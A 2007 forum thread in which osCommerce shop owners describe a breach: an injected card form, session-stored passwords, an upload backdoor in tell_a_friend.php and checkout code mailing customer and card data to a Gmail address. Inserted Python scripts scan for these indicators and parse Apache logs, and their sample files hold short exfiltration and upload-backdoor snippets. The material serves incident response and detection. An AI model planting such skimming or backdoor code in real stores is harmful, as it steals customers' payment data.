Trimast (Posted October 8, 2007)

Hi All,

Where to start! I've a client that uses the Protx form payment method and has been doing so for 12 months. I had a call from them this morning, saying one of their customers had entered their credit card details into the payment form on the site and then been redirected to Protx. On investigation I've found that somehow (not quite sure yet, still investigating) the Protx form has been changed to take credit card details on the site in a totally insecure way, then send the customer to Protx for further payment.

Upon further investigation, I've found a number of files have appeared on the server within the catalog/images folder:

cvv.html
yzx.txt
two image files for Mastercard and Amex

Additionally, the following files within catalog/ have all been modified:

index.php
create_account.php
login.php
tell_a_friend.php

Each modified file contains the following:

// da edit xong

The login file contains this code at line 26:

$password123 = $password;
session_unregister("password123");
session_register("password123");
// da edit xong

create_account.php contains, around line 55:

$password123 = $password;
session_unregister("password123");
session_register("password123");
// da edit xong

The index file contains, at the bottom of the file:

$td_query = tep_db_query("UPDATE `configuration` SET `configuration_value` = 'true' where `configuration_key` = 'ACCOUNT_DOB'");

Tell a Friend: the tell_a_friend.php file is of most concern, as it has been modified to allow the hacker to upload other modified files. My belief is that the tell a friend file was the first to be modified and then the hackers used this file to do their work, by uploading the other files.

As far as I can ascertain no other files have been modified / hacked. If this is new to the community then everybody needs to be aware, as these people must know their way around OSC and which files to exploit.

My entire internal network is now undergoing a major security sweep to establish whether they got access via a malware application on one of our systems. We are also speaking with the hosting company to establish whether there have been any security breaches on the server. If anybody has experienced this before and knows if there is a security breach or "hole" within OSC, then if they could let me know I can close it all up. As soon as I've established how the changes to the Protx form have been made I'll update this post, in case somebody else is unfortunate enough to experience the same thing.

Regards,
Rob
Hade (Posted October 8, 2007)

Scary stuff. I wonder if they got in through OSC? What version are you running? 2.2 MS2?

Trimast (Posted October 8, 2007)

Yes, MS2.2 but with loads of contributions. It is quite scary. I've just spent 30 minutes on the phone with the solicitor!!
Trimast (Posted October 8, 2007)

Hi All,

Just to post an update: after spending the past few hours going through each file, I've managed to find out that the hackers have also modified the catalog/checkout_confirmation.php page in a major way. They are basically now running a DB query that extracts the customer's details, i.e. name, address, email, post code, date of birth etc., combining this with the posted credit card details and then emailing these to a Gmail address.

I've still not been able to establish how they are able to add the credit card details form into the payment page; however, I've now deleted the entire shopping cart and will be re-installing the shop in due course. If anybody has any ideas as to how they've managed to do this, and even more importantly a security fix, I'd be delighted to know.

Regards,
Rob
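The indicators Rob lists across his two posts (the "// da edit xong" marker, the plaintext password copied into the session, the forced ACCOUNT_DOB setting, the mail-to-Gmail exfiltration in checkout_confirmation.php, an upload primitive in tell_a_friend.php, and non-image files dropped into catalog/images) can be swept for mechanically before a rebuild. The scanner below is an added example, not code from the thread or from osCommerce; the exact exfiltration code and the upload mechanism were not quoted, so the `mail(...@gmail.com` and `move_uploaded_file`/`$_FILES` patterns are assumptions about their shape, and the sample tree it builds is constructed for the demonstration.

```python
"""Triage scanner for the osCommerce compromise indicators described in the thread.
Added example; indicator regexes and the sample files are constructed from the
posts, the exfiltration and upload patterns are assumptions about their shape."""
import re
import tempfile
from pathlib import Path

# Patterns taken from the quoted snippets, plus two assumed shapes (mail/upload).
CODE_INDICATORS = [
    ("marker comment", re.compile(r"//\s*da edit xong")),
    ("password copied into session",
     re.compile(r"session_register\(\s*['\"]password123['\"]\s*\)")),
    ("DOB collection forced on",
     re.compile(r"UPDATE\s+`?configuration`?\s+SET\s+`?configuration_value`?\s*=\s*'true'"
                r"\s+where\s+`?configuration_key`?\s*=\s*'ACCOUNT_DOB'", re.I)),
    # Assumption: the exfiltration is a PHP mail() call whose arguments name a gmail.com address.
    ("mail() to a webmail address", re.compile(r"mail\s*\([^;]*@gmail\.com", re.I | re.S)),
    # Assumption: the storefront (catalog/) of stock MS2.2 handles no uploads, so any
    # upload handling there is suspect.
    ("file upload handling", re.compile(r"move_uploaded_file\s*\(|\$_FILES\b")),
]
# catalog/images should hold images only; these extensions do not belong there.
IMAGE_DIR_BAD_EXT = {".html", ".htm", ".txt", ".php", ".phtml"}
PHP_EXT = {".php", ".phtml", ".inc"}


def scan_file(rel_path, text):
    """Return a (rel_path, description) tuple for every indicator found in one file."""
    return [(rel_path, desc) for desc, pat in CODE_INDICATORS if pat.search(text)]


def scan_tree(root):
    """Walk a catalog/ tree: flag non-image files under images/ and indicator
    strings inside PHP files. Returns a list of (relative_path, description)."""
    root = Path(root)
    findings = []
    for path in sorted(root.rglob("*")):
        if not path.is_file():
            continue
        rel = path.relative_to(root).as_posix()
        if rel.startswith("images/") and path.suffix.lower() in IMAGE_DIR_BAD_EXT:
            findings.append((rel, "non-image file in images/"))
        if path.suffix.lower() in PHP_EXT:
            findings.extend(scan_file(rel, path.read_text(errors="replace")))
    return findings


def build_sample_tree():
    """Constructed sample catalog/ tree (not the real files): one clean file and
    one file per indicator quoted or described in the thread."""
    root = Path(tempfile.mkdtemp())
    (root / "images").mkdir()
    files = {
        "shopping_cart.php": "<?php\n// clean stock file\n?>",
        "login.php": ("<?php\n$password123 = $password;\nsession_unregister(\"password123\");\n"
                      "session_register(\"password123\");\n// da edit xong\n?>"),
        "index.php": ("<?php\n$td_query = tep_db_query(\"UPDATE `configuration` SET "
                      "`configuration_value` = 'true' where `configuration_key` = 'ACCOUNT_DOB'\");\n?>"),
        # Assumed shape of the exfiltration described in the post, not the real code.
        "checkout_confirmation.php": "<?php\nmail('someone@gmail.com', 'order', $details);\n?>",
        # Assumed shape of the upload backdoor described in the post, not the real code.
        "tell_a_friend.php": ("<?php\nif (isset($_FILES['f'])) { move_uploaded_file("
                              "$_FILES['f']['tmp_name'], $_FILES['f']['name']); }\n// da edit xong\n?>"),
        "images/cvv.html": "<html>fake card form</html>",
        "images/yzx.txt": "data",
        "images/logo.gif": "GIF89a",
    }
    for rel, content in files.items():
        (root / rel).write_text(content)
    return root


if __name__ == "__main__":
    for rel, desc in scan_tree(build_sample_tree()):
        print(f"{rel}: {desc}")
```

A string scanner only finds what it is told to look for; the authoritative check is a file-by-file comparison of the live tree against a pristine copy of the same osCommerce version plus the installed contributions, which also catches modified files that carry none of these markers.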
dougm (Posted October 11, 2007)

I checked mine out and did not find this. I had some odd hacks earlier that looked like banking phishing scams. The hackers had somehow loaded fake bank websites and were directing them to my server to phish for account logins. I ended up reporting it to the server folks and then changing my passwords and deleting the fake sites.

I am now dealing with a new one and can't figure out if this is a hack or robots or what, but my FTP login keeps getting blocked from the server for security reasons and I noticed the event logs are filling up with hits like the following (hundreds of them):

[Wed Oct 10 06:02:29 2007] [error] [client 66.249.65.46] File does not exist: /home/pcbizus/public_html/jacksonmadeleine/webstore/images/infobox//golden-vicary-privet.html
[Wed Oct 10 05:59:47 2007] [error] [client 66.249.65.46] File does not exist: /home/pcbizus/public_html/jacksonmadeleine/webstore/images/infobox//unlock-lg-cell-phone.html

As you can see they go to the osC webstore/images dir and start hitting it looking for something. What does the // do in the middle of the link?
dougm (Posted October 11, 2007)

I found that the admin directory had the password protection disabled. I enabled it again, also after changing the passwords again, and found that the errors in the logs changed soon after.... hmmmm, looks like hackers to me...

[Thu Oct 11 01:12:50 2007] [error] PHP Warning: readfile(/home/pcbizus/public_html/jacksonmadeleine/webstore//images/corner_right.gif) [<a href='function.readfile'>function.readfile</a>]: failed to open stream: No such file or directory in /home/pcbizus/public_html/jacksonmadeleine/webstore/admin/file_manager.php on line 69
[Thu Oct 11 01:12:50 2007] [error] PHP Warning: readfile(/home/pcbizus/public_html/jacksonmadeleine/webstore//images/corner_left.gif) [<a href='function.readfile'>function.readfile</a>]: failed to open stream: No such file or directory in /home/pcbizus/public_html/jacksonmadeleine/webstore/admin/file_manager.php on line 69
[Thu Oct 11 01:12:50 2007] [error] PHP Warning: readfile(/home/pcbizus/public_html/jacksonmadeleine/webstore//images/arrow_right.gif) [<a href='function.readfile'>function.readfile</a>]: failed to open stream: No such file or directory in /home/pcbizus/public_html/jacksonmadeleine/webstore/admin/file_manager.php on line 69
[Thu Oct 11 01:07:51 2007] [error] [client 66.249.65.46] File does not exist: /home/pcbizus/public_html/jacksonmadeleine/webstore/images/infobox//quinceanos.html
[Thu Oct 11 01:02:46 2007] [error] [client 66.249.65.46] File does not exist: /home/pcbizus/public_html/jacksonmadeleine/webstore/images/infobox//chery-pie.html
[Thu Oct 11 00:57:43 2007] [error] [client 66.249.65.46] File does not exist: /home/pcbizus/public_html/jacksonmadeleine/webstore/images/infobox//kone-west.html

dougm (Posted October 11, 2007)

Looks like the culprit here is a Google robot: 66.249.65.46. Nice.
Trimast (Posted October 11, 2007)

Hi dougm,

My reading of what you have indicated is that Google was / is actually spidering these hacker pages, and if you've removed them then they can no longer be found, or the // is sending them to a directory that does not exist. But this normally ignores the second /, so image//infobox/image.gif would be the same as images/infobox/images.gif. Normally the // indicates that there is a missing directory between the two //; that is the only time I've ever encountered it, and that is normally during the debugging of a script I've written, but it normally only affects things when you are using the full path and not a URL.

I'd check all of the files that you've mentioned, and the two directories, for any files that do not look right. Download them to a new folder and then open them up in whatever web development software you use and check them, then delete them if they've been compromised and replace them with your original files (check them too first for compromise).

More importantly, have you established how they got in in the first place?

Rob
disp507 (Posted October 11, 2007)

[quoting Trimast's reply to dougm, above]

Do either of you have access to the web server logs themselves? That might help lead you to the source of the intrusion. Depending on the level of logging configured you might be able to even get a hint at where the attacker came from.

- Jim
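Jim's suggestion is the right one, and dougm's own error_log excerpt already shows what a first pass looks like: the "File does not exist" hits all come from one client requesting pages under images/infobox/ with a doubled slash, while the admin/file_manager.php warnings carry no client IP at all (PHP warnings are logged without one) and so must be correlated with the access log by timestamp. The parser below is an added example, not code from the thread; it summarises the lines dougm posted per client and per PHP script, and the 66.249.64.0/19 check is an assumption that this is Google's crawler range, which in practice should be confirmed by reverse-then-forward DNS rather than by an IP list.

```python
"""Apache error_log triage for the lines dougm posted. Added example; the log
text is copied from the thread, the Googlebot range is an assumption."""
import ipaddress
import re
from collections import Counter

# Copied from the thread (one line per entry).
SAMPLE_LOG = """\
[Wed Oct 10 06:02:29 2007] [error] [client 66.249.65.46] File does not exist: /home/pcbizus/public_html/jacksonmadeleine/webstore/images/infobox//golden-vicary-privet.html
[Wed Oct 10 05:59:47 2007] [error] [client 66.249.65.46] File does not exist: /home/pcbizus/public_html/jacksonmadeleine/webstore/images/infobox//unlock-lg-cell-phone.html
[Thu Oct 11 01:12:50 2007] [error] PHP Warning: readfile(/home/pcbizus/public_html/jacksonmadeleine/webstore//images/corner_right.gif) [<a href='function.readfile'>function.readfile</a>]: failed to open stream: No such file or directory in /home/pcbizus/public_html/jacksonmadeleine/webstore/admin/file_manager.php on line 69
[Thu Oct 11 01:12:50 2007] [error] PHP Warning: readfile(/home/pcbizus/public_html/jacksonmadeleine/webstore//images/corner_left.gif) [<a href='function.readfile'>function.readfile</a>]: failed to open stream: No such file or directory in /home/pcbizus/public_html/jacksonmadeleine/webstore/admin/file_manager.php on line 69
[Thu Oct 11 01:07:51 2007] [error] [client 66.249.65.46] File does not exist: /home/pcbizus/public_html/jacksonmadeleine/webstore/images/infobox//quinceanos.html
"""

# Apache 2.0/2.2 error_log layout: [timestamp] [level] [client ip] message
LINE_RE = re.compile(r"^\[(?P<ts>[^\]]+)\] \[(?P<level>\w+)\] "
                     r"(?:\[client (?P<client>[^\]]+)\] )?(?P<msg>.*)$")
MISSING_RE = re.compile(r"^File does not exist: (?P<path>\S+)")
PHP_RE = re.compile(r"^PHP (?P<kind>Warning|Notice|Fatal error): .* in (?P<script>\S+) on line (?P<line>\d+)")
# Assumption: published Google crawler range; confirm any IP with rDNS to googlebot.com
# and a forward lookup back to the same address before trusting it.
GOOGLEBOT_NET = ipaddress.ip_network("66.249.64.0/19")


def parse_line(line):
    """Split one error_log line into its fields; return None for lines that do not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    miss = MISSING_RE.match(rec["msg"])
    php = PHP_RE.match(rec["msg"])
    rec["missing_path"] = miss.group("path") if miss else None
    rec["php_script"] = php.group("script") if php else None
    return rec


def in_googlebot_range(ip):
    """True if ip falls inside the assumed Googlebot range (invalid strings are False)."""
    try:
        return ipaddress.ip_address(ip) in GOOGLEBOT_NET
    except ValueError:
        return False


def summarise(log_text):
    """Count 404-style misses per client, doubled-slash requests, and PHP warnings
    per script; note which clients sit in the crawler range."""
    missing_by_client = Counter()
    php_by_script = Counter()
    double_slash = 0
    crawler_clients = set()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["missing_path"]:
            missing_by_client[rec["client"] or "-"] += 1
            if "//" in rec["missing_path"]:
                double_slash += 1
        if rec["php_script"]:
            php_by_script[rec["php_script"]] += 1
        if rec["client"] and in_googlebot_range(rec["client"]):
            crawler_clients.add(rec["client"])
    return {
        "missing_by_client": missing_by_client,
        "double_slash_requests": double_slash,
        "php_warnings_by_script": php_by_script,
        "crawler_clients": crawler_clients,
    }


if __name__ == "__main__":
    for key, value in summarise(SAMPLE_LOG).items():
        print(f"{key}: {value}")
```

Run against the full error_log the useful output is the admin-script counter: every script under admin/ that shows up there was executed by someone, and the timestamps give you the window to search in the access log for the client that called it.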
porpoise1954 (Posted October 11, 2007)

[quoting Trimast's update of October 8, above]

That's one of the main reasons we don't even collect that data, let alone store it. We leave that to our third party payment solution provider. Let them take the risk!

Trimast (Posted October 11, 2007)

My server log files are changed every 24 hours, so I've not been able to use those, unfortunately. They were the first things I asked for, though, but no joy.

As for storing CC details: if we do, then we only store 8 digits randomly selected as per a sequence agreed with the client and then encrypted using a random key only known to the client. Not even I know what the key is. The other 8 digits are then emailed as a block and the customer then matches them up as per the agreed sequence. It does work well, as you need to know the exact sequence code and the random key, but where possible I prefer to send payments to a Protx or WorldPay; that way I don't have to worry about these things too much!!